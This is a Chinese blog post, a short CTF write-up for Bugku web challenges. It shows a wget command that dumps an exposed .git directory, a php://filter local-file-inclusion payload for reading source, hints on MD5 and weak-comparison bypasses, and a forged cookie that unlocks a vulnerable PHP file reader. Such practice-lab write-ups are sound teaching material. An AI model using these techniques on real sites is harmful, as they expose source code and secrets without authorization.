AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

bugku web篇(一)

2022-12-02 193 发布于江苏
版权
举报
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: bugku web篇(一)

bugku web篇(一)

source

WEB

描  述: 我哥说渗透我只用linux环境

wget -r http://114.67.246.176:17328/.git

下载后进入目录

cmd

git reflog

git show xxx

xxx为git reflog出来的东西的名字,git show 40c6d51

源代码WEB 已解决

分数: 20 金币: 2

题目作者: harry

一  血: lsmzr

一血奖励: 1金币

解  决: 6813

提  示:

描  述: 看看源代码?

文件包含

WEB 已解决

描  述: flag{}

http://xxxx/?file=php://filter/read=convert.base64-encode/resource=index.php

好像需要密码

WEB

描  述: 好像需要密码

备份是个好习惯

WEB 未解决

描  述: 备份是个好习惯

1、弱类型比较:科学计数法和数组都可以 2、复写key绕过

dirsearch扫描出bak备份目录,然后分析源码,使用md5绕过

cookies

WEB 未解决

描  述: cookies欺骗

通过以上python 脚本,即可读取index.php的源代码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
构造Cookie 信息
Cookie: margin=margin
keys.php 进行base64 编码a2V5cy5waHA=

文章标签:
PHP
开发工具
Linux
数据安全/隐私保护
git
关键词:
bugku web
web bugku
5q2a2sugf4ej6
+关注
59文章
目录
打赏
0
0
0
0
10
分享
相关文章
香甜可口草莓蛋糕
|
10月前
|
SQL XML 安全
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
香甜可口草莓蛋糕
306 2
白猫a
|
JavaScript 前端开发
Bugku CTF web 你必须让他停下来 解题思路
Bugku CTF web 你必须让他停下来 解题思路
白猫a
142 2
白猫a
Bugku CTF web GET 解题思路
Bugku CTF web GET 解题思路
白猫a
127 0
白猫a
bugku ctf Web POST 解题思路
火狐插件HackBar
白猫a
146 0
5q2a2sugf4ej6
|
安全 JavaScript Shell
bugku web篇(二)
bugku web篇(二)
5q2a2sugf4ej6
284 0
bugku web篇(二)
5q2a2sugf4ej6
|
SQL 安全 PHP
bugku web篇(三)
bugku web篇(三)
5q2a2sugf4ej6
129 0
bugku web篇(三)
落寞的鱼
|
程序员 Shell PHP
CTF BugKu平台———(Web篇②)
CTF BugKu平台———(Web篇②)总结
落寞的鱼
377 0
CTF BugKu平台———(Web篇②)
落寞的鱼
|
Shell PHP 开发工具
CTF BugKu平台—(Web篇①)
CTF BugKu平台—(Web篇①)
落寞的鱼
571 0
游客4rnkeq2m7q5hy
|
2天前
|
机器学习/深度学习 开发框架 API
Python 高级编程与实战:深入理解 Web 开发与 API 设计
在前几篇文章中,我们探讨了 Python 的基础语法、面向对象编程、函数式编程、元编程、性能优化、调试技巧以及数据科学和机器学习。本文将深入探讨 Python 在 Web 开发和 API 设计中的应用,并通过实战项目帮助你掌握这些技术。
游客4rnkeq2m7q5hy
12 2
土木林森
|
5月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
土木林森
296 3

热门文章

最新文章

  • 1
    部署使用 CHAT-NEXT-WEB 基于 Deepseek
    123
  • 2
    FastAPI与Selenium:打造高效的Web数据抓取服务 —— 采集Pixabay中的图片及相关信息
    22
  • 3
    【02】客户端服务端C语言-go语言-web端PHP语言整合内容发布-优雅草网络设备监控系统-2月12日优雅草简化Centos stream8安装zabbix7教程-本搭建教程非docker搭建教程-优雅草solution
    5
  • 4
    java spring 项目若依框架启动失败,启动不了服务提示端口8080占用escription: Web server failed to start. Port 8080 was already in use. Action: Identify and stop the process that’s listening on port 8080 or configure this application to listen on another port-优雅草卓伊凡解决方案
    8
  • 5
    Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
    2
  • 6
    零基础构建开源项目OpenIM桌面应用和pc web- Electron篇
    6
  • 7
    docker快速部署OS web中间件 数据库 编程应用
    10
  • 8
    【2025优雅草开源计划进行中01】-针对web前端开发初学者使用-优雅草科技官网-纯静态页面html+css+JavaScript可直接下载使用-开源-首页为优雅草吴银满工程师原创-优雅草卓伊凡发布
    4
  • 9
    打造高效的Web Scraper:Python与Selenium的完美结合
    8
  • 10
    AppSpider Pro 7.5.015 for Windows - Web 应用程序安全测试
    5
  • 1
    Python 高级编程与实战:深入理解 Web 开发与 API 设计
    12
  • 2
    从模型托管到交互开发:DataV 如何简化三维 Web 应用构建?
    26
  • 3
    WEB CAD插件通过上下文对象MxPluginContext修改UI界面的方法
    20
  • 4
    docker快速部署OS web中间件 数据库 编程应用
    38
  • 5
    打造高效的Web Scraper:Python与Selenium的完美结合
    39
  • 6
    Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
    41
  • 7
    AppSpider Pro 7.5.015 for Windows - Web 应用程序安全测试
    32
  • 8
    【02】客户端服务端C语言-go语言-web端PHP语言整合内容发布-优雅草网络设备监控系统-2月12日优雅草简化Centos stream8安装zabbix7教程-本搭建教程非docker搭建教程-优雅草solution
    70
  • 9
    部署使用 CHAT-NEXT-WEB 基于 Deepseek
    623
  • 10
    【2025优雅草开源计划进行中01】-针对web前端开发初学者使用-优雅草科技官网-纯静态页面html+css+JavaScript可直接下载使用-开源-首页为优雅草吴银满工程师原创-优雅草卓伊凡发布
    38

    • 相关课程

    更多
  • Python Web开发基础
  • Java Web开发系列课程 - Spring框架入门
  • 企业Web常用架构LAMP-LNMP实战
  • 高校精品课-西安交通大学-Web 编程技术
  • Java Web项目实战 - 图书商城
  • Java面试疑难点解析 - Java Web开发

    • 相关电子书

    更多
  • Web应用系统性能优化
  • 高性能Web架构之缓存体系
  • PWA:移动Web的现在与未来

    • 相关实验场景

    更多
  • 每个IT人都想学的“Web应用上云经典架构”实战
  • 使用SLB+2ECS+NAS,部署电商web网站的高可用架构
  • 1分钟SAE部署Web在线游戏
  • Html5和Webpack3:Webpack5的常见用法
  • Html5和Webpack1:Webpack5打包工具介绍
  • 前端开发基础1:前端开发环境的安装和配置
    • 下一篇
    通义万相:视觉生成大模型再进化
    目录